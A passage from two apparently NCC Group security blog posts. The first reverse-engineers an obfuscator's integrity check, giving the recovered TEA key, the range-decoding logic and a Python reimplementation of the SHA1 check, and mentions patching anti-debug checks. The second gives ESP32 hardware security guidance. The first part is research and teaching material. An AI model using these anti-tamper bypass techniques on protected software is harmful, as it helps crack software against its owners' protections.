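    return (uint32_t)(c0 + c2) == ~c1; /* both sides are 0xEB53300A */
}
```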

A variant using the same exception handler operates in a very similar manner, substituting the debug exception with an access violation triggered via allocating a guard page and accessing it (this behavior is also flagged by ICPin).

Rebuilding The Executable

Once all the passes have been applied to all the obfuscated functions, the patches can be recorded, then applied to a free area of the new executable, and a JUMP is inserted at the function’s original offset.

Example of a function before and after deobfuscation:

Obfuscator’s Integrity Checking Internals

It is generally unnecessary to dig into the details of an obfuscator’s integrity checking mechanism; most times, as described in the previous example, identifying its location or expected result is sufficient to disable it. However, this provides a good opportunity to demonstrate the use of a DSE to address an obfuscator’s internals – theoretically its most hardened part.

ICPin output immediately highlights a number of code locations performing incremental reads on addresses in the executable’s .text section. Some manual investigation of these code locations points us to the spot where a function call or branching instruction switches to the obfuscated execution flow. However, there are no clearly defined function frames and the entire set of executed instructions is too large to display in IDA.

In order to get a sense of the execution flow, a simple jitter callback can be used to gather all the executed blocks as the engine runs through the code. Looking at the discovered blocks, it becomes apparent that the code uses conditional instructions to alter the return address on the stack, and hides its real destination with opaque predicates and obfuscated logic.

Starting with that information, it would be possible to take a similar approach as in the previous example and thoroughly rebuild the IR CFG, apply simplifications, and recompile the new assembly using LLVM. However, in this instance, armed with the knowledge that this obfuscated code implements an integrity check, it is advantageous to leverage the capabilities of a DSE.

A CFG of the obfuscated flow can still be roughly computed, by recording every block executed and adding edges based on the tracked destinations. The stock simplifications and SSA form can be used to obtain a graph of the general shape below:

Deciphering The Data Blobs

On a first run attempt, one can observe 8-byte reads from blobs located in two separate memory locations in the .text section, which are then processed through a loop (also conveniently identified by the tracking engine). With the memX symbols representing constants in memory, and blob0 representing the sequentially read input from a 32bit ciphertext blob, the symbolic values extracted from the blobs look as follows, looping 32 times:

res = (blob0 + ((mem1 ^ mem2)*mul) + sh32l((mem1 ^ mem2), 0x5)) ^ (mem3 + sh32l(blob0, 0x4)) ^ (mem4 + sh32r(blob0,  0x5))

Inspection of the values stored at memory locations mem1 and mem2 reveals the following constants:

@32[0x1400DF45A]: 0xA46D3BBF
@32[0x14014E859]: 0x3A5A4206

0xA46D3BBF^0x3A5A4206 = 0x9E3779B9

0x9E3779B9 is a well-known nothing up my sleeve number, based on the golden ratio, and notably used by RC5. In this instance however, the expression points at another Feistel cipher, TEA, or Tiny Encryption Algorithm:

void decrypt (uint32_t v[2], const uint32_t k[4]) {
    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up; sum is 32*delta */
    uint32_t delta=0x9E3779B9;                     /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
    for (i=0; i<32; i++) {                         /* basic cycle start */
        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        sum -= delta;
    }
    v[0]=v0; v[1]=v1;
}

Consequently, the 128-bit key can be trivially recovered from the remaining memory locations identified by the symbolic engine.
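As a sanity check that the recovered loop really is TEA, the reference cipher pair below round-trips, and the asserts tie the recovered memory constants back to the algorithm's delta and initial sum (the key used in the test is an arbitrary placeholder, not the recovered one):

```c
#include <assert.h>
#include <stdint.h>

/* Reference TEA pair; the decrypt loop mirrors the one recovered from
 * the obfuscated integrity check. */
static const uint32_t DELTA = 0x9E3779B9u;

void tea_encrypt(uint32_t v[2], const uint32_t k[4]) {
    uint32_t v0 = v[0], v1 = v[1], sum = 0;
    for (int i = 0; i < 32; i++) {
        sum += DELTA;
        v0 += ((v1 << 4) + k[0]) ^ (v1 + sum) ^ ((v1 >> 5) + k[1]);
        v1 += ((v0 << 4) + k[2]) ^ (v0 + sum) ^ ((v0 >> 5) + k[3]);
    }
    v[0] = v0; v[1] = v1;
}

void tea_decrypt(uint32_t v[2], const uint32_t k[4]) {
    uint32_t v0 = v[0], v1 = v[1], sum = 0xC6EF3720u; /* 32 * DELTA mod 2^32 */
    for (int i = 0; i < 32; i++) {
        v1 -= ((v0 << 4) + k[2]) ^ (v0 + sum) ^ ((v0 >> 5) + k[3]);
        v0 -= ((v1 << 4) + k[0]) ^ (v1 + sum) ^ ((v1 >> 5) + k[1]);
        sum -= DELTA;
    }
    v[0] = v0; v[1] = v1;
}

/* The split constants recovered from memory XOR to the TEA delta. */
uint32_t recovered_delta(void) { return 0xA46D3BBFu ^ 0x3A5A4206u; }
```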

Extracting The Offset Ranges

With the decryption cipher identified, the next step is to reverse the logic of computing the ranges of memory to be hashed. Here again, the memory tracking execution engine proves useful and provides two data points of interest:

  • The binary is not hashed in a continuous way; rather, 8-byte offsets are regularly skipped
  • A memory region is iteratively accessed before each hashing

Using a DSE such as this one, symbolizing the first two bytes of the memory region and letting it run all the way to the address of the instruction that reads memory, we obtain the output below (edited for clarity):

-- MEM ACCESS: {BLOB0 & 0x7F 0 8, 0x0 8 64} + 0x140000000
# {BLOB0 0 8, 0x0 8 32} & 0x80 = 0x0
...

-- MEM ACCESS: {(({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32} 0 32, 0x0 32 64} + 0x140000000
# 0x0 = ({BLOB0 0 8, 0x0 8 32} & 0x80)?(0x0,0x1)
# ((({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32}) == 0xFFFFFFFF = 0x0
...

The accessed memory’s symbolic addresses alone provide a clear hint at the encoding: only 7 of the bits of each symbolized byte are used to compute the address. Looking further into the accesses, the second byte is only used if the first byte’s most significant bit is set, which tracks with a simple unsigned integer base-128 compression. Essentially, the algorithm reads one byte at a time, using 7 bits for data, and using the remaining bit to indicate whether one or more additional bytes should be read to compute the final value.
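
This encoding can be decoded with a few lines of Python; the sketch below is equivalent in spirit to the varint handling inside the `parse_ranges()` function shown later.

```python
def read_varints(data):
    """Decode a stream of unsigned base-128 varints: each byte contributes
    7 data bits (little-endian first); a set MSB means more bytes follow."""
    vals, val, shift = [], 0, 0
    for b in data:
        val |= (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:          # MSB clear: this value is complete
            vals.append(val)
            val, shift = 0, 0
    return vals
```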

Identifying The Hashing Algorithm

In order to establish whether the integrity checking implements a known hashing algorithm, despite the static disassembly showing no sign of known constants, a memory tracking symbolic execution engine can be used to investigate one level deeper. Early in the execution (running the obfuscated code in its entirety may take a long time), one can observe the following pattern, revealing well-known SHA1 constants.

0x140E34F50 READ @32[0x140D73B5D]: 0x96F977D0
0x140E34F52 READ @32[0x140B1C599]: 0xF1BC54D1
0x140E34F54 READ @32[0x13FC70]: 0x0
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD0]: 0x67452301

0x140E34F50 READ @32[0x140D73B61]: 0x752ED515
0x140E34F52 READ @32[0x140B1C59D]: 0x9AE37E9C
0x140E34F54 READ @32[0x13FC70]: 0x1
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD4]: 0xEFCDAB89

0x140E34F50 READ @32[0x140D73B65]: 0xF9396DD4
0x140E34F52 READ @32[0x140B1C5A1]: 0x6183B12A
0x140E34F54 READ @32[0x13FC70]: 0x2
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD8]: 0x98BADCFE

0x140E34F50 READ @32[0x140D73B69]: 0x2A1B81B5
0x140E34F52 READ @32[0x140B1C5A5]: 0x3A29D5C3
0x140E34F54 READ @32[0x13FC70]: 0x3
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCDC]: 0x10325476

0x140E34F50 READ @32[0x140D73B6D]: 0xFB95EF83
0x140E34F52 READ @32[0x140B1C5A9]: 0x38470E73
0x140E34F54 READ @32[0x13FC70]: 0x4
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCE0]: 0xC3D2E1F0

Examining the relevant code addresses (as seen in the SSA notation below), it becomes evident that, in order to compute the necessary hash constants, a simple XOR instruction is used with two otherwise meaningless constants, rendering algorithm identification less obvious from static analysis alone.

And the expected SHA1 constants are stored on the stack:

0x96F977D0^0xF1BC54D1 ==> 0x67452301
0x752ED515^0x9AE37E9C ==> 0XEFCDAB89
0xF9396DD4^0x6183B12A ==> 0X98BADCFE
0x2A1B81B5^0x3A29D5C3 ==> 0X10325476
0xFB95EF83^0x38470E73 ==> 0XC3D2E1F0
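
These pairs can be checked mechanically; a quick Python sanity check over the constants captured in the trace above:

```python
# Each pair of "meaningless" constants read from .text XORs to one of the
# five SHA1 initialization words (constants taken from the trace above).
pairs = [(0x96F977D0, 0xF1BC54D1), (0x752ED515, 0x9AE37E9C),
         (0xF9396DD4, 0x6183B12A), (0x2A1B81B5, 0x3A29D5C3),
         (0xFB95EF83, 0x38470E73)]
sha1_iv = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0]
assert [a ^ b for a, b in pairs] == sha1_iv
```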

Additionally, the SHA1 algorithm steps can be further observed in the SSA graph, such as the ROTL-5 and ROTL-30 operations, plainly visible in the IL below.

Final Results

The entire integrity-checking logic recovered from the obfuscator, implemented in Python below, was verified to produce the same digest as when running under the debugger or a straightforward LLVM jitter. The parse_ranges() function handles the encoding, while the accumulate_bytes() generator handles the deciphering and processing of both range blobs and skipped offset blobs.

Once the hashing of the memory ranges dictated by the offset table has completed, the 64bit values located at the offsets deciphered from the second blob are subsequently hashed. Finally, once the computed hash value has been successfully compared to the valid digest stored within the RWX .text section of the executable, the execution flow is deemed secure and the obfuscator proceeds to decipher protected functions within the .text section.

def parse_ranges(table):
  ranges = []
  rangevals = []
  tmp = []
  for byte in table:
    tmp.append(byte)
    if not byte&0x80:
      val = 0
      for i,b in enumerate(tmp):
        val |= (b&0x7F)<<(7*i)
      rangevals.append(val)
      tmp = [] # reset
  offset = 0
  for p in [(rangevals[i], rangevals[i+1]) for i in range(0, len(rangevals), 2)]:
    offset += p[0]
    if offset == 0xFFFFFFFF:
      break
    ranges.append((p[0], p[1]))
    offset += p[1]
  return ranges

def accumulate_bytes(r, s):
  # TEA Key is 128 bits
  dw6 = 0xF866ED75
  dw7 = 0x31CFE1EF
  dw4 = 0x1955A6A0
  dw5 = 0x9880128B
  key = struct.pack('IIII', dw6, dw7, dw4, dw5)
  # Decipher ranges plaintext
  ranges_blob = pe[pe.virt2off(r[0]):pe.virt2off(r[0])+r[1]]
  ranges = parse_ranges(Tea(key).decrypt(ranges_blob))
  # Decipher skipped offsets plaintext (8bytes long)
  skipped_blob = pe[pe.virt2off(s[0]):pe.virt2off(s[0])+s[1]]
  skipped_decrypted = Tea(key).decrypt(skipped_blob)
  skipped = sorted( \
    [int.from_bytes(skipped_decrypted[i:i+4], byteorder='little', signed=False) \
        for i in range(0, len(skipped_decrypted), 4)][:-2:2] \
  )
  skipped_copy = skipped.copy()
  next_skipped = skipped.pop(0)
  current = 0x0
  for rr in ranges:
    current += rr[0]
    size = rr[1]
    # Get the next 8 bytes to skip
    while size and next_skipped and next_skipped < current+size:
      blob = pe[pe.rva2off(current):pe.rva2off(current)+(next_skipped-current)]
      size -= len(blob)+8
      assert size >= 0
      yield blob
      current = next_skipped+8
      next_skipped = skipped.pop(0) if skipped else None
    blob = pe[pe.rva2off(current):pe.rva2off(current)+size]
    yield blob
    current += len(blob)
  # Append the initially skipped offsets
  yield b''.join(pe[pe.rva2off(rva):pe.rva2off(rva)+0x8] for rva in skipped_copy)
  return

def main():
  global pe
  hashvalue = hashlib.sha1()
  hashvalue.update(b'\x7B\x0A\x97\x43')
  with open(argv[1], "rb") as f:
    pe = PE(f.read())
  accumulator = accumulate_bytes((0x140A85B51, 0xFCBCF), (0x1409D7731, 0x12EC8))
  # Get all hashed bytes
  for blob in accumulator:
    hashvalue.update(blob)
  print(f'SHA1 FINAL: {hashvalue.hexdigest()}')
  return

Disclaimer

None of the samples used in this publication were part of an NCC Group engagement. They were selected from publicly available binaries whose obfuscators exhibited features similar to previously encountered ones.

Due to the nature of this material, specific content had to be redacted, and a number of tools that were created as part of this effort could not be shared publicly.

Despite these limitations, the author hopes the technical content shared here is sufficient to provide the reader with a stimulating read.

Hardware Security By Design: ESP32 Guidance

31 May 2022 at 20:51

Within the Hardware and Embedded Systems practice at NCC Group, some engagements with clients are early in the design phases of a product. In other cases, however, our first interaction occurs late in the development cycle, once a product has been designed, implemented, and functionally tested. While assessments performed at this time can help identify vulnerabilities and reasonable mitigations, certain security-impacting design decisions have already been set in stone and are not easily or cheaply changed. This is especially true as it relates to component selection, hardware design, and configuration. Security by design sets the foundation for these crucial controls to be appropriately implemented.

Increasingly, system-on-chip (SoC) vendors make hardware security features available that can and should underpin the security of products built on their platforms. In this blog post, NCC Group considers some of these features and the corresponding product design decisions for the current generation of Espressif’s ESP32 microcontrollers. The ESP32 is a platform commonly used in the broad span of IoT products that NCC Group assesses regularly and one that has continued to develop its hardware and SDK security features over multiple product generations.

Espressif provides ample documentation about these features, but how they translate to product security best practices is worth further discussion. Much of this discussion focuses on specific configuration details of the ESP32 family of microcontrollers and the recommended best practices associated with those details, but many broad recommendations included here apply to secure hardware designs in general.

ESP32 Best Practices

The importance of any given best practice depends on a variety of factors, some of which can be quite specific to the threat model of a product. With that caveat, since this is a generalized discussion, a general ordering of importance is applied here.

Secure Boot

Secure boot is an important security feature that prevents an attacker from tampering with firmware to execute arbitrary code. By enabling secure boot, the firmware image integrity and authenticity is verified against customer keys that were programmed during manufacturing. The nuanced details of how this integrity is validated matter.

ESP32 Implementation

The ESP32 supports two versions of secure boot.

Version 1 (V1) is based on a symmetric AES scheme that is no longer recommended as of ESP32 Revision 3.

Version 2 (V2) relies on RSA-PSS to verify the bootloader and application image at boot time before execution.

There is also support for App Signing Verification, the install-time verification of applications received over-the-air. Espressif acknowledges that there may be cases where this is warranted, but NCC Group strongly discourages the use of this feature as it precludes the use of boot-time verification.

Secure boot is very simply enabled by programming a properly configured bootloader. The idf.py menuconfig tool allows for this configuration and flashing. Once a properly configured bootloader, formatted partition table and signed application are flashed in this manner, secure boot will automatically be enabled.

But “simply” is not necessarily an apt word choice when discussing secure boot configuration. Enabling secure boot on any SoC involves a well-established process to burn eFuses, provision keys and load an initial signed image at manufacturing time. The image signing process too must ensure the cryptographic hygiene of the signing keys and the provenance of the images being signed. The management of the firmware signing key (that is, its generation, storage, usage, and rotation) is an important consideration that NCC Group has previously discussed at length.

Some SoC vendors, Espressif included, can enable secure boot prior to shipment to the device manufacturing facility, mitigating some threats to this process. This requires the public signing key and a signed initial image to be provided to Espressif, and confirmation at manufacturing time that the process was performed as expected. Disabling UART download mode may be postponed to later in manufacturing to mitigate the risk of any over-the-air update failure, but this too should be explicitly verified. Product manufacturing processes depend on several factors related to security, cost, and logistics, among other considerations. Contract manufacturing facilities or an OEM’s own facilities may be able to provide similar capabilities that provide more flexibility, but critically, this step should be performed in a trusted environment.

Debug Capabilities

What may be the most obvious configuration step is also one of the most critical. Too often, features that facilitate development and debugging make their way into production units, which can then later be used by attackers.

Hardware debug capabilities should be disabled in production devices to prevent a physical attacker from attaching a debugger, which may allow them to read/write SRAM and flash memory, exposing secrets or undermining secure boot.

ESP32 Implementation

On the ESP32, JTAG debugging is implicitly disabled by the bootloader when secure boot or flash encryption is enabled, so enabling those features as recommended requires no further configuration to meet this recommendation.

However, it is worth noting that the CONFIG_SECURE_BOOT_ALLOW_JTAG configuration will circumvent this behavior, and so it is important to ensure that it is not changed from its default, cleared state in the project configuration. Similarly, the recovery ROM debug console provides an extensive set of debug capabilities that absolutely should be disabled by setting CONSOLE_DEBUG_DISABLE.

Flash Encryption

Many microcontrollers provide some amount of internal flash, distinct from an external SPI flash chip that may also be incorporated into a product design for additional persistent storage. Internal flash cannot be accessed via board traces or pads and so often represents a more suitable location for the storage of sensitive user data or code. Any such data stored in external flash must have suitable cryptographic controls to meet its associated confidentiality and integrity requirements.

ESP32 Implementation

All user flash used by the ESP32 is off-chip, exposed over a SPI interface that sophisticated attackers may access to read or modify flash contents. Furthermore, most application code is executed in place from flash.

The flash encryption feature, if enabled and configured appropriately, provides a measure of security for a variety of assets (including code) that are stored on the ESP32 flash, mitigating potential attacks that aim to expose the contents of memory.

The ESP32 supports flash encryption for its off-chip SPI flash component, providing confidentiality to any sensitive assets stored therein. The nuances and limitations of this feature, many of which are documented by Espressif, are important to note.

Data Integrity

Importantly, the flash encryption provided by the ESP32 is based on AES ECB mode with a “tweaked” key per block like AES XTS, a common primitive used in disk encryption. Although the scheme provides confidentiality, it offers no guarantees of data integrity. Modification of the ciphertext stored in flash will decrypt successfully in the absence of any other validation of the data.

Depending on what is stored in flash and how that data is handled by firmware, this may allow an attacker to impact the behavior of the device, for example by exploiting a memory safety vulnerability or causing the device to fall back into a re-initialization state.

Similarly, any code read or executed from flash after secure boot has run would be subject to similar tampering if the SPI flash interface is physically accessible. Admittedly, it is difficult to modify a ciphertext such that it decrypts to a binary capable of running successfully. More practically, an attacker with access to SPI flash may be able to rewrite a block with a known previous ciphertext to impact device behavior. Replay attacks of this nature may effectively allow a downgrade of data stored in flash (a whitelist or trusted certificate authority, for example) to a previous, vulnerable version.

Block Size Disparity

The limitations of AES ECB are present in this encryption scheme despite the varying tweak described further below. Because AES uses 16-byte blocks, and the tweak is incremented for every 32 bytes, adjacent block-pairs are encrypted with the same key using AES ECB. If the content of these pairs is identical, the ciphertext too will be identical, which may reveal meaningful information to an attacker. An attacker with knowledge of the device’s flash layout may be able to determine the number of empty flash blocks based on the number of identical block-pairs, which may allow inference of sensitive information pertaining to the device or its users.
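
To make the block-pair leak concrete, the toy Python model below (using SHA-256 as a stand-in block cipher; this is emphatically not the real ESP32 AES scheme) shows how a tweak that only changes every 32 bytes lets an attacker spot identical adjacent plaintext blocks, such as erased 0xFF regions.

```python
import hashlib

def toy_flash_encrypt(key, flash):
    """Toy model of a per-32-byte-tweaked ECB scheme (NOT the real ESP32
    cipher): a deterministic 16-byte 'block cipher' keyed by the root key
    XORed with a tweak derived from the 32-byte pair index."""
    out = []
    for i in range(0, len(flash), 16):
        tweak = (i // 32).to_bytes(16, 'little')  # same tweak across a 32-byte pair
        tweaked_key = bytes(a ^ b for a, b in zip(key, tweak))
        out.append(hashlib.sha256(tweaked_key + flash[i:i+16]).digest()[:16])
    return b''.join(out)

key = bytes(16)
# Two erased (all-0xFF) 32-byte regions surrounding 32 bytes of real data.
flash = b'\xFF' * 32 + b'some secret data'.ljust(32, b'\x00') + b'\xFF' * 32
ct = toy_flash_encrypt(key, flash)
blocks = [ct[i:i+16] for i in range(0, len(ct), 16)]
# Within a 32-byte pair, identical plaintext halves encrypt identically...
assert blocks[0] == blocks[1] and blocks[4] == blocks[5]
# ...while the changing tweak hides equality across different pair offsets.
assert blocks[0] != blocks[4]
```

An attacker scanning a dump for repeated adjacent ciphertext pairs could thus map out empty regions without any key material.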

Fault Injection Attacks

In both 2019 and 2020, methods were disclosed to bypass flash encryption. With physical access, an attacker may be able to bypass the read protection on the flash encryption key, allowing them to decrypt flash contents. While these may be mitigated in newer hardware, the most recent public recommendation includes storing sensitive data in flash no longer than is necessary.

Key Provisioning

Additionally, to mitigate any potential attacks against assets stored in encrypted flash, the ESP32 allows unique encryption keys to be generated and provisioned to each device by default. This detail should be highlighted since unique and unexposed flash encryption keys are often an effective control, limiting the impact of a single compromised key and mitigating fleet-wide attacks. The ESP32 also supports a host-generated key, but the documentation astutely notes that this is not recommended for production.

Tweaked Keys

The algorithm to encrypt flash blocks involves the XORing of the block index with certain bits of the root key. NCC Group notes that this is distinct from a typical tweaked cipher such as AES XTS, though even established ciphers have known weaknesses in disk encryption. These distinctions and weaknesses do not necessarily undermine the basic goal of this flash encryption scheme to protect the confidentiality of flash-persisted data, but they may provide further support for caution when using flash encryption as a broad security control.

Tweak Size

Finally, NCC Group noted that the bits used for the tweak, that is, the bits that are XORed with the root key, are configurable via the FLASH_CRYPT_CONFIG eFuse. If all bits of this eFuse are cleared, there will be no tweak of the root key over the entire flash space, effectively reducing the encryption scheme to AES ECB. An attacker with access to flash may, in this case, exploit the shortcomings of AES ECB to determine which blocks are alike, determine the contents of flash blocks with a chosen plaintext attack, or perform replay attacks more easily. NCC Group notes that while this is an optional eFuse configuration that should be avoided, the bootloader disallows it absent explicit intervention, as shown here.

/* CRYPT_CONFIG determines which bits of the AES block key are XORed 
with bits from the flash address, to provide the key tweak. 
CRYPT_CONFIG == 0 is effectively AES ECB mode (NOT SUPPORTED) 
For now this is hardcoded to XOR all 256 bits of the key. 
If you need to override it, you can pre-burn this efuse to the 
desired value and then write-protect it, in which case this 
operation does nothing. Please note this is not recommended! 
*/ 

ESP_LOGI(TAG, "Setting CRYPT_CONFIG efuse to 0xF"); 
new_wdata5 |= EFUSE_FLASH_CRYPT_CONFIG_M; 

Flash Encryption Recommendations

Per Espressif’s guidance, configure the bootloader to generate the flash encryption key on the part, unique per device.

Consider the sensitivity of assets stored within flash. While the effort to compromise this data may be more difficult with flash encryption, two considerations are of note:

• If authenticity of data stored in flash is required, and this data is not part of signed and version-controlled firmware, additional measures to protect against replay and ciphertext tampering must be implemented. This is not likely a requirement of a stored Wi-Fi password but may be for an SSID, for example.

• If the data is of a sufficiently high value, such as a secret key common across all devices, the above-described attacks or similarly complex variants may be employed to extract it. This aligns with reasonable security best practices and Espressif’s specifically recommended mitigations to the described fault injection vulnerabilities that all secrets stored in device flash be unique per-device.

Lastly, use an NVS partition to store sensitive data. This provides some mitigation of the shortcoming associated with adjacent blocks being encrypted with the same key. In cases where a sensitive portion of flash requires frequent rewrites, designate a writable NVS partition dedicated to this purpose.

Boot Modes and UART capability

Without the appropriate eFuse configuration, the UART provides a mechanism to both update ESP32 firmware and to exercise tooling that can read sensitive device information.

The ESP32 provides the option to specify the source from which firmware will be loaded via the logic level of some GPIOs.

In ESP32 ECO V3 parts, a new eFuse, UART_DOWNLOAD_DIS, was added to disallow the DOWNLOAD_BOOT mode. This mode effectively provides flash access over UART. While secure boot should disallow any untrusted firmware from being loaded, restricting this access further limits any potential vulnerability. More importantly, this restricts access to eFuses that would normally be available via espefuse.py and the accompanying UART commands that it uses. This provides a specific capability in cases where eFuse BLK3, available for user applications, is used to store an immutable device secret. Without this mechanism, the typical eFuse readout protection would be the only other chip-level method to prevent UART access to such a secret, but this would render it unreadable to software as well.

The UART_DOWNLOAD_DIS configuration should be set on production devices, shown here.

> espefuse.py dump -p /dev/cu.SLAB_USBtoUART 
Connecting...esp32r0_delay... False 
.. 
Detecting chip type... ESP32 
BLOCK0 ( ) [0 ] read_regs: 00000000 2aec0d28 00cca803 000 
0a200 00001535 00100000 00000004 
BLOCK1 (flash_encryption) [1 ] read_regs: 00000000 00000000 00000000 000 
00000 00000000 00000000 00000000 00000000 
BLOCK2 (secure_boot_v1 s) [2 ] read_regs: 00000000 00000000 00000000 000 
00000 00000000 00000000 00000000 00000000 
BLOCK3 ( ) [3 ] read_regs: 00000000 00000000 00000000 000 
00000 00000000 00000000 00000000 00000000 
espefuse.py v3.0 
> espefuse.py burn_efuse UART_DOWNLOAD_DIS 1 -p /dev/cu.SLAB_USBtoUART 
Connecting...esp32r0_delay... False 
.. 
Detecting chip type... ESP32 
espefuse.py v3.0 
The efuses to burn: 
from BLOCK0 
- UART_DOWNLOAD_DIS 
Burning efuses: 
- 'UART_DOWNLOAD_DIS' (Disable UART download mode (ESP32 rev3 only)) 0b0 - 0b1 
 

Check all blocks for burn... 
idx, BLOCK_NAME, Conclusion 
[00] BLOCK0 is not empty 
(written ): 0x0000000400100000000015350000a20000cca8032aec0d2800000000 

(to write): 0x00000000000000000000000000000000000000000000000008000000 
(coding scheme = NONE) 
. 
This is an irreversible operation! 
Type 'BURN' (all capitals) to continue. 
BURN 
BURN BLOCK0 - OK (all write block bits are set) 
Reading updated efuses... 
Checking efuses... 
Successful 
> espefuse.py dump -p /dev/cu.SLAB_USBtoUART 
Connecting...esp32r0_delay... False 
.....esp32r0_delay... True 
_____esp32r0_delay... False 
.....esp32r0_delay... True 
_____esp32r0_delay... False 
.....esp32r0_delay... True 
..... (loops forever: Download mode is locked down and the chip is no longer accessible)

Rollback Protection

Anti-rollback is an important feature that prevents an attacker from “updating” a device with an older firmware image version. An attacker may wish to downgrade firmware if the older version happens to contain known vulnerabilities that can be easily exploited. Such scenarios are advantageous to an adversary that wishes to compromise the device to expose the sensitive contents of memory or to achieve code execution.

ESP32 Implementation

As part of the over-the-air update process, the ESP32 supports a mechanism for rollback prevention, in which a secure_version field within an application is compared against that stored in eFuse. Because of the nature of the eFuse value used, secure_version is limited to 32 values. It should be noted that if firmware updates are distributed over an authenticated channel, the threat of downgrading to a vulnerable version, mitigated by rollback prevention, requires the existence of a vulnerability in this OTA functionality or physical access to the device flash. This threat is therefore generally considered to pose minimal risk. In cases where signed firmware is distributed over an insecure channel or from a user application that may be more easily exploited, the threat of this downgrade is more likely.

Enabling rollback prevention per Espressif’s documentation involves configuring the bootloader with the CONFIG_BOOTLOADER_APP_ANTI_ROLLBACK option and calling esp_ota_mark_app_valid_cancel_rollback() at some reasonable time after boot to establish the currently running firmware as stable, preventing rollback thereafter without risking a denial of service in the event of an unstable firmware update.

As part of a software maintenance process, criteria for increasing the secure_version of application updates should be established that align with the release schedule and product lifetime. For example, assuming a quarterly release cycle and a product lifetime of 10 years (roughly 40 releases), this may involve increasing the value on alternating releases, leaving headroom to increase it in hot-fix scenarios where a known vulnerability must be patched and disallowed from running.

If a 32-value range is determined to be insufficient, a secondary, weaker form of rollback prevention may be implemented at install time, in which a signed version header or timestamp is first validated against that of the currently installed application, disallowing downgrade through this flow. In the event of a critical vulnerability to the application or this check in particular, the bootloader-based rollback prevention may instead be used by incrementing the secure_version field. The secure_version field should be incremented at some reasonable minimum cadence regardless of the details of this design.
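
The one-way nature of the eFuse-backed version check described above can be illustrated with a toy Python model (this is a conceptual sketch, not ESP-IDF code; the unary bit encoding of the version counter is an assumption for illustration):

```python
class ToyAntiRollback:
    """Toy model of eFuse-based rollback prevention: the device version is
    encoded in one-way eFuse bits, so it can only ever increase, and a
    32-bit field caps secure_version at 32 distinct values."""
    def __init__(self):
        self.efuse_bits = 0  # eFuse bits can be set but never cleared

    def device_version(self):
        return bin(self.efuse_bits).count('1')

    def try_boot(self, app_secure_version):
        # The bootloader refuses images older than the burned device version.
        return app_secure_version >= self.device_version()

    def mark_app_valid(self, app_secure_version):
        # Deferred until the new firmware is deemed stable, since burning
        # the bits is irreversible (cf. esp_ota_mark_app_valid_cancel_rollback).
        assert app_secure_version <= 32
        self.efuse_bits |= (1 << app_secure_version) - 1

dev = ToyAntiRollback()
assert dev.try_boot(0) and dev.try_boot(1)
dev.mark_app_valid(2)           # version 2 confirmed stable
assert not dev.try_boot(1)      # downgrade to version 1 now rejected
assert dev.try_boot(2) and dev.try_boot(3)
```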

Secure Factory Reset

Devices may store sensitive data long after they have been decommissioned, allowing vulnerabilities discovered later to be exploited if obtained.

While regulations and definitions pertaining to the handling of personal information exist, the sensitivity of stored data can vary significantly; a user’s treatment of this data is in many ways outside of the scope and control of the OEM, as is the potential impact in the event of its exfiltration. The same can be said of any other potentially sensitive user data. A reset mechanism that erases these sensitive assets gives the customer an option to incorporate it into any processes where their sensitive data stored on these devices may be unnecessarily exposed.

ESP32 Implementation

In the case of the ESP32, the flash erase API is straightforward and does not distinguish between secure erasure of blocks and deletion or invalidation of individual portions, but regardless of the implementation, explicitly overwriting stored data with zeroes is prudent. If NVS is used, however, past entries remain stored even after being updated with more recent values, and so the entire NVS partition should be erased.

As part of product design, it is worthwhile to enumerate all potentially sensitive user data stored in device flash. This may include device logs, state information, mobile device pairing information, and authentication keys or tokens. Implement a mechanism to allow the customer to overwrite this data as part of a decommissioning process. While allowing this to be done remotely may be convenient, this should ideally be possible in scenarios where the device is in some unrecoverable state, thus encouraging the implementation of factory reset capability via a physical button.

Finally, it is important to test this functionality by dumping flash using ESP tools after performing this erasure, ensuring that even unused partitions (for example as part of a multi-partition firmware update “A/B” scheme) are similarly erased.

Wi-Fi Provisioning

Finally, one fairly core requirement of IoT devices is the initial establishment of Wi-Fi credentials. These credentials should be secured at rest once on the device, as discussed in the Flash Encryption section above. The secure transmission of the credentials is another important consideration. In the absence of a complete user interface on the device, some out-of-band key exchange between an initializing user application and the device is necessary to accomplish this.

ESP32 Implementation

Espressif provides a couple of options for this out of the box, using either SoftAP mode, which strictly relies on Wi-Fi, or BLE.

With respect to SoftAP mode, it is important to set the wifi_prov_security argument to WIFI_PROV_SECURITY_1, as shown in Espressif’s sample implementation.

In addition to protecting the Wi-Fi credentials themselves, it is further important to consider the circumstances that the device can enter the provisioning mode to connect to another network. The threats associated with this consideration will vary, but often, physical access to the device to factory reset it or otherwise force a reprovisioning state is a reasonable method. Still, this does not necessarily address physical threats in a multi-tenant environment such as an office building, hotel, or outdoors, and so additional consideration is warranted to ensure that the device is connected to a trusted network even when that network is unavailable or must be changed.

Conclusion

The above discussion covers some of the main considerations that should be established early in the design of any ESP32-based product. Provisioning a root of trust, determining how and where to store secrets, and configuring eFuses are all critical to product security and not easily addressed late in the release cycle or in-field.

